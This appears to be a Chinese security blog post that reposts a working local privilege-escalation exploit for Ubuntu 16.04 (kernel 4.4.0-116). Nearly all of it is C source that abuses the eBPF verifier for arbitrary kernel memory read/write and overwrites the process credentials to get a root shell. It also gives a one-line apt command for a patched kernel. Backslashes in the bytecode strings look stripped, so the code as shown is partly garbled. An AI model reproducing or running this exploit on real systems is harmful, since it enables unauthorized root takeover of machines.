微慑信息网

Ubuntu 16.04 LTS 0day priv escalation[最新提权漏洞]

Ubuntu 16.04最新提权漏洞:

all 4.4 ubuntu aws instances are vulnerable: echo “deb xenial-proposed restricted main multiverse universe” > /etc/apt/sources.list && apt update && apt install linux-image-4.4.0-117-generic

测试腾讯云:

参考:

https://twitter.com/vnik5287/status/974439706896187392 http://cyseclabs.com/exploits/upstream44.c

拓展阅读(点评/知识):

EXP

/*
 * Ubuntu 16.04.4 kernel priv esc
 *
 * all credits to @bleidl
 * - vnik
 */

// Tested on:
// 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64
// if different kernel adjust CRED offset + check kernel stack size
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <fcntl.h>
#include <string.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <stdint.h>

#define PHYS_OFFSET 0xffff880000000000
#define CRED_OFFSET 0x5f8
#define UID_OFFSET 4
#define LOG_BUF_SIZE 65536
#define PROGSIZE 328

int sockets[2];
int mapfd, progfd;

char *__prog = 	"xb4x09x00x00xffxffxffxff"
		"x55x09x02x00xffxffxffxff"
		"xb7x00x00x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x18x19x00x00x03x00x00x00"
		"x00x00x00x00x00x00x00x00"
		"xbfx91x00x00x00x00x00x00"
		"xbfxa2x00x00x00x00x00x00"
		"x07x02x00x00xfcxffxffxff"
		"x62x0axfcxffx00x00x00x00"
		"x85x00x00x00x01x00x00x00"
		"x55x00x01x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x79x06x00x00x00x00x00x00"
		"xbfx91x00x00x00x00x00x00"
		"xbfxa2x00x00x00x00x00x00"
		"x07x02x00x00xfcxffxffxff"
		"x62x0axfcxffx01x00x00x00"
		"x85x00x00x00x01x00x00x00"
		"x55x00x01x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x79x07x00x00x00x00x00x00"
		"xbfx91x00x00x00x00x00x00"
		"xbfxa2x00x00x00x00x00x00"
		"x07x02x00x00xfcxffxffxff"
		"x62x0axfcxffx02x00x00x00"
		"x85x00x00x00x01x00x00x00"
		"x55x00x01x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x79x08x00x00x00x00x00x00"
		"xbfx02x00x00x00x00x00x00"
		"xb7x00x00x00x00x00x00x00"
		"x55x06x03x00x00x00x00x00"
		"x79x73x00x00x00x00x00x00"
		"x7bx32x00x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x55x06x02x00x01x00x00x00"
		"x7bxa2x00x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00"
		"x7bx87x00x00x00x00x00x00"
		"x95x00x00x00x00x00x00x00";

char bpf_log_buf[LOG_BUF_SIZE];

static int bpf_prog_load(enum bpf_prog_type prog_type,
		  const struct bpf_insn *insns, int prog_len,
		  const char *license, int kern_version) {
	union bpf_attr attr = {
		.prog_type = prog_type,
		.insns = (__u64)insns,
		.insn_cnt = prog_len / sizeof(struct bpf_insn),
		.license = (__u64)license,
		.log_buf = (__u64)bpf_log_buf,
		.log_size = LOG_BUF_SIZE,
		.log_level = 1,
	};

	attr.kern_version = kern_version;

	bpf_log_buf[0] = 0;

	return syscall(__NR_bpf, BPF_PROG_LOAD, &attr, sizeof(attr));
}

static int bpf_create_map(enum bpf_map_type map_type, int key_size, int value_size,
		   int max_entries) {
	union bpf_attr attr = {
		.map_type = map_type,
		.key_size = key_size,
		.value_size = value_size,
		.max_entries = max_entries
	};

	return syscall(__NR_bpf, BPF_MAP_CREATE, &attr, sizeof(attr));
}

static int bpf_update_elem(uint64_t key, uint64_t value) {
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)&key,
		.value = (__u64)&value,
		.flags = 0,
	};

	return syscall(__NR_bpf, BPF_MAP_UPDATE_ELEM, &attr, sizeof(attr));
}

static int bpf_lookup_elem(void *key, void *value) {
	union bpf_attr attr = {
		.map_fd = mapfd,
		.key = (__u64)key,
		.value = (__u64)value,
	};

	return syscall(__NR_bpf, BPF_MAP_LOOKUP_ELEM, &attr, sizeof(attr));
}

static void __exit(char *err) {
	fprintf(stderr, "error: %sn", err);
	exit(-1);
}

static void prep(void) {
	mapfd = bpf_create_map(BPF_MAP_TYPE_ARRAY, sizeof(int), sizeof(long long), 3);
	if (mapfd < 0)
		__exit(strerror(errno));

	progfd = bpf_prog_load(BPF_PROG_TYPE_SOCKET_FILTER,
			(struct bpf_insn *)__prog, PROGSIZE, "GPL", 0);

	if (progfd < 0)
		__exit(strerror(errno));

	if(socketpair(AF_UNIX, SOCK_DGRAM, 0, sockets))
		__exit(strerror(errno));

	if(setsockopt(sockets[1], SOL_SOCKET, SO_ATTACH_BPF, &progfd, sizeof(progfd)) < 0)
		__exit(strerror(errno));
}

static void writemsg(void) {
	char buffer[64];

	ssize_t n = write(sockets[0], buffer, sizeof(buffer));

	if (n < 0) {
		perror("write");
		return;
	}
	if (n != sizeof(buffer))
		fprintf(stderr, "short write: %lun", n);
}

#define __update_elem(a, b, c) 
	bpf_update_elem(0, (a)); 
	bpf_update_elem(1, (b)); 
	bpf_update_elem(2, (c)); 
	writemsg();

static uint64_t get_value(int key) {
	uint64_t value;

	if (bpf_lookup_elem(&key, &value))
		__exit(strerror(errno));

	return value;
}

static uint64_t __get_fp(void) {
	__update_elem(1, 0, 0);

	return get_value(2);
}

static uint64_t __read(uint64_t addr) {
	__update_elem(0, addr, 0);

	return get_value(2);
}

static void __write(uint64_t addr, uint64_t val) {
	__update_elem(2, addr, val);
}

static uint64_t get_sp(uint64_t addr) {
	return addr & ~(0x4000 - 1);
}

static void pwn(void) {
	uint64_t fp, sp, task_struct, credptr, uidptr;

	fp = __get_fp();
	if (fp < PHYS_OFFSET)
		__exit("bogus fp");
	
	sp = get_sp(fp);
	if (sp < PHYS_OFFSET)
		__exit("bogus sp");
	
	task_struct = __read(sp);

	if (task_struct < PHYS_OFFSET)
		__exit("bogus task ptr");

	printf("task_struct = %lxn", task_struct);

	credptr = __read(task_struct + CRED_OFFSET); // cred

	if (credptr < PHYS_OFFSET)
		__exit("bogus cred ptr");

	uidptr = credptr + UID_OFFSET; // uid
	if (uidptr < PHYS_OFFSET)
		__exit("bogus uid ptr");

	printf("uidptr = %lxn", uidptr);
	__write(uidptr, 0); // set both uid and gid to 0

	if (getuid() == 0) {
		printf("spawning root shelln");
		system("/bin/bash");
		exit(0);
	}

	__exit("not vulnerable?");
}

int main(int argc, char **argv) {
	prep();
	pwn();

	return 0;
}

 

本文标题:Ubuntu 16.04 LTS 0day priv escalation[最新提权漏洞]
本文链接:
(转载请附上本文链接)
http://vulsee.com/archives/vulsee_2018/0316_6231.html
转载请附本站链接,未经允许不得转载,,谢谢:微慑信息网-VulSee.com » Ubuntu 16.04 LTS 0day priv escalation[最新提权漏洞]
分享到: 更多 (0)

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址

微慑信息网 专注工匠精神

访问我们联系我们